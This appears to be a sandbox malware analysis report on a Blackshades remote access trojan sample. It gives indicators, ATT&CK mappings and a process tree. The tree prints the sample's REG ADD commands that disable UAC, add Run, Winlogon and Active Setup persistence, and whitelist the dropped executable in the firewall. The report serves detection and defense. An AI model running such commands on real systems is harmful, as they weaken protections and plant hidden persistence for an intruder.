blackshades | 35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479

Analysis

max time kernel
120s
max time network
110s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05-02-2025 00:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
Size

1.7MB
MD5

9c8faa08895326855039435ed6a33c30
SHA1

91b32df2d75a393f248debf1de8b787179332b1c
SHA256

35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479
SHA512

14c82044d7bc1945522dec468f12ff3a3de6137157b83b13d3d8cbd78575c579d7f5f7f9ef7c30b64f33f14c62eb786a3f00432760e7da4e536d0235d48323c4
SSDEEP

24576:69SQXgnU56Gt4ULYVI8RGwvrK7/ckFLI78c2:KsnxUh

Score

10^/10

blackshades defense_evasion discovery persistence rat trojan upx

Malware Config

Signatures

Blackshades
Blackshades is a remote access trojan with various capabilities.
rat blackshades
Blackshades family
blackshades

Blackshades payload 12 IoCs

resource	yara_rule
behavioral1/memory/2024-104-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral1/memory/2024-117-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral1/memory/2024-120-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral1/memory/2024-122-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral1/memory/2024-125-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral1/memory/2024-127-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral1/memory/2024-129-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral1/memory/2024-131-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral1/memory/2024-133-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral1/memory/2024-135-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral1/memory/2024-137-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral1/memory/2024-139-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe, C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe"	reg.exe

Modifies firewall policy service 3 TTPs 8 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Users\Admin\AppData\Roaming\vb6.exe = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe:*:Enabled:Windows Messanger"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files (x86)\Internet Explorer\Ieupdate.exe = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe:*:Enabled:Windows Messanger"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	reg.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run	Ieupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe"	Ieupdate.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 4 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe"	Ieupdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}	Ieupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe"	Ieupdate.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}	Ieupdate.exe

Executes dropped EXE 3 IoCs

pid	Process
2396	Ieupdate.exe
2024	Ieupdate.exe
1828	Ieupdate.exe

Loads dropped DLL 6 IoCs

pid	Process
2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
2396	Ieupdate.exe
2396	Ieupdate.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe"	Ieupdate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe"	Ieupdate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\IeUpdate = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\IeUpdate = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe"	reg.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Ieupdate.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2396 set thread context of 2024	2396	Ieupdate.exe	44
PID 2396 set thread context of 1828	2396	Ieupdate.exe	45

UPX packed file 18 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2024-101-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/2024-99-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/2024-104-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/1828-111-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/memory/1828-114-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/memory/1828-113-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/memory/2024-117-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/1828-119-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/memory/2024-120-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/2024-122-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/2024-125-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/2024-127-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/2024-129-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/2024-131-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/2024-133-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/2024-135-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/2024-137-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral1/memory/2024-139-0x0000000000400000-0x000000000045C000-memory.dmp	upx

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Internet Explorer\Ieupdate.txt	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\Ieupdate.txt	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
File created	C:\Program Files (x86)\Internet Explorer\Ieupdate.exe	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\Ieupdate.exe	Ieupdate.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\Ieupdate.exe	Ieupdate.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ieupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ieupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ieupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
1656	reg.exe
3004	reg.exe
2464	reg.exe
1204	reg.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: 1	2024	Ieupdate.exe
Token: SeCreateTokenPrivilege	2024	Ieupdate.exe
Token: SeAssignPrimaryTokenPrivilege	2024	Ieupdate.exe
Token: SeLockMemoryPrivilege	2024	Ieupdate.exe
Token: SeIncreaseQuotaPrivilege	2024	Ieupdate.exe
Token: SeMachineAccountPrivilege	2024	Ieupdate.exe
Token: SeTcbPrivilege	2024	Ieupdate.exe
Token: SeSecurityPrivilege	2024	Ieupdate.exe
Token: SeTakeOwnershipPrivilege	2024	Ieupdate.exe
Token: SeLoadDriverPrivilege	2024	Ieupdate.exe
Token: SeSystemProfilePrivilege	2024	Ieupdate.exe
Token: SeSystemtimePrivilege	2024	Ieupdate.exe
Token: SeProfSingleProcessPrivilege	2024	Ieupdate.exe
Token: SeIncBasePriorityPrivilege	2024	Ieupdate.exe
Token: SeCreatePagefilePrivilege	2024	Ieupdate.exe
Token: SeCreatePermanentPrivilege	2024	Ieupdate.exe
Token: SeBackupPrivilege	2024	Ieupdate.exe
Token: SeRestorePrivilege	2024	Ieupdate.exe
Token: SeShutdownPrivilege	2024	Ieupdate.exe
Token: SeDebugPrivilege	2024	Ieupdate.exe
Token: SeAuditPrivilege	2024	Ieupdate.exe
Token: SeSystemEnvironmentPrivilege	2024	Ieupdate.exe
Token: SeChangeNotifyPrivilege	2024	Ieupdate.exe
Token: SeRemoteShutdownPrivilege	2024	Ieupdate.exe
Token: SeUndockPrivilege	2024	Ieupdate.exe
Token: SeSyncAgentPrivilege	2024	Ieupdate.exe
Token: SeEnableDelegationPrivilege	2024	Ieupdate.exe
Token: SeManageVolumePrivilege	2024	Ieupdate.exe
Token: SeImpersonatePrivilege	2024	Ieupdate.exe
Token: SeCreateGlobalPrivilege	2024	Ieupdate.exe
Token: 31	2024	Ieupdate.exe
Token: 32	2024	Ieupdate.exe
Token: 33	2024	Ieupdate.exe
Token: 34	2024	Ieupdate.exe
Token: 35	2024	Ieupdate.exe
Token: SeDebugPrivilege	2024	Ieupdate.exe
Token: SeDebugPrivilege	1828	Ieupdate.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
2396	Ieupdate.exe
2024	Ieupdate.exe
2024	Ieupdate.exe
1828	Ieupdate.exe
2024	Ieupdate.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 1856	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	30
PID 2380 wrote to memory of 1856	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	30
PID 2380 wrote to memory of 1856	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	30
PID 2380 wrote to memory of 1856	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	30
PID 1856 wrote to memory of 2512	1856	cmd.exe	32
PID 1856 wrote to memory of 2512	1856	cmd.exe	32
PID 1856 wrote to memory of 2512	1856	cmd.exe	32
PID 1856 wrote to memory of 2512	1856	cmd.exe	32
PID 1856 wrote to memory of 2440	1856	cmd.exe	33
PID 1856 wrote to memory of 2440	1856	cmd.exe	33
PID 1856 wrote to memory of 2440	1856	cmd.exe	33
PID 1856 wrote to memory of 2440	1856	cmd.exe	33
PID 2380 wrote to memory of 2708	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	34
PID 2380 wrote to memory of 2708	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	34
PID 2380 wrote to memory of 2708	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	34
PID 2380 wrote to memory of 2708	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	34
PID 2708 wrote to memory of 2736	2708	cmd.exe	36
PID 2708 wrote to memory of 2736	2708	cmd.exe	36
PID 2708 wrote to memory of 2736	2708	cmd.exe	36
PID 2708 wrote to memory of 2736	2708	cmd.exe	36
PID 2380 wrote to memory of 2820	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	37
PID 2380 wrote to memory of 2820	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	37
PID 2380 wrote to memory of 2820	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	37
PID 2380 wrote to memory of 2820	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	37
PID 2820 wrote to memory of 2864	2820	cmd.exe	39
PID 2820 wrote to memory of 2864	2820	cmd.exe	39
PID 2820 wrote to memory of 2864	2820	cmd.exe	39
PID 2820 wrote to memory of 2864	2820	cmd.exe	39
PID 2380 wrote to memory of 2576	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	40
PID 2380 wrote to memory of 2576	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	40
PID 2380 wrote to memory of 2576	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	40
PID 2380 wrote to memory of 2576	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	40
PID 2576 wrote to memory of 2996	2576	cmd.exe	42
PID 2576 wrote to memory of 2996	2576	cmd.exe	42
PID 2576 wrote to memory of 2996	2576	cmd.exe	42
PID 2576 wrote to memory of 2996	2576	cmd.exe	42
PID 2380 wrote to memory of 2396	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	43
PID 2380 wrote to memory of 2396	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	43
PID 2380 wrote to memory of 2396	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	43
PID 2380 wrote to memory of 2396	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	43
PID 2380 wrote to memory of 2396	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	43
PID 2380 wrote to memory of 2396	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	43
PID 2380 wrote to memory of 2396	2380	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	43
PID 2396 wrote to memory of 2024	2396	Ieupdate.exe	44
PID 2396 wrote to memory of 2024	2396	Ieupdate.exe	44
PID 2396 wrote to memory of 2024	2396	Ieupdate.exe	44
PID 2396 wrote to memory of 2024	2396	Ieupdate.exe	44
PID 2396 wrote to memory of 2024	2396	Ieupdate.exe	44
PID 2396 wrote to memory of 2024	2396	Ieupdate.exe	44
PID 2396 wrote to memory of 2024	2396	Ieupdate.exe	44
PID 2396 wrote to memory of 2024	2396	Ieupdate.exe	44
PID 2396 wrote to memory of 2024	2396	Ieupdate.exe	44
PID 2396 wrote to memory of 2024	2396	Ieupdate.exe	44
PID 2396 wrote to memory of 2024	2396	Ieupdate.exe	44
PID 2396 wrote to memory of 2024	2396	Ieupdate.exe	44
PID 2396 wrote to memory of 1828	2396	Ieupdate.exe	45
PID 2396 wrote to memory of 1828	2396	Ieupdate.exe	45
PID 2396 wrote to memory of 1828	2396	Ieupdate.exe	45
PID 2396 wrote to memory of 1828	2396	Ieupdate.exe	45
PID 2396 wrote to memory of 1828	2396	Ieupdate.exe	45
PID 2396 wrote to memory of 1828	2396	Ieupdate.exe	45
PID 2396 wrote to memory of 1828	2396	Ieupdate.exe	45
PID 2024 wrote to memory of 1812	2024	Ieupdate.exe	46
PID 2024 wrote to memory of 1812	2024	Ieupdate.exe	46

C:\Users\Admin\AppData\Local\Temp\35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
"C:\Users\Admin\AppData\Local\Temp\35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\JNYVYK.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1856
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center /v UACDisableNotify /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2512
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    PID:2440
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\NrlMw.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "IeUpdate" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:2736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\sAQxI.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2820
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "IeUpdate" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:2864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\MkjGV.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2576
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "Explorer.exe, C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f
    3⤵
    - Modifies WinLogon for persistence
    - System Location Discovery: System Language Discovery
    PID:2996
- C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
  "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2396
- - C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
    "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"
    3⤵
    - Adds policy Run key to start application
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2024
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1812
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f
        5⤵
        Modifies firewall policy service
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1656
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe:*:Enabled:Windows Messanger" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2344
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe:*:Enabled:Windows Messanger" /f
        5⤵
        Modifies firewall policy service
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2464
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:864
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f
        5⤵
        Modifies firewall policy service
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3004
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\vb6.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\vb6.exe:*:Enabled:Windows Messanger" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2028
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\vb6.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\vb6.exe:*:Enabled:Windows Messanger" /f
        5⤵
        Modifies firewall policy service
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1204
- - C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
    "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

Filesize
1.7MB

MD5
3de69e0bf9fd5469ba95b4b8442a2c61

SHA1
c2497ff32a924c3bf193a4b7e89c5ba55cfa3e7d

SHA256
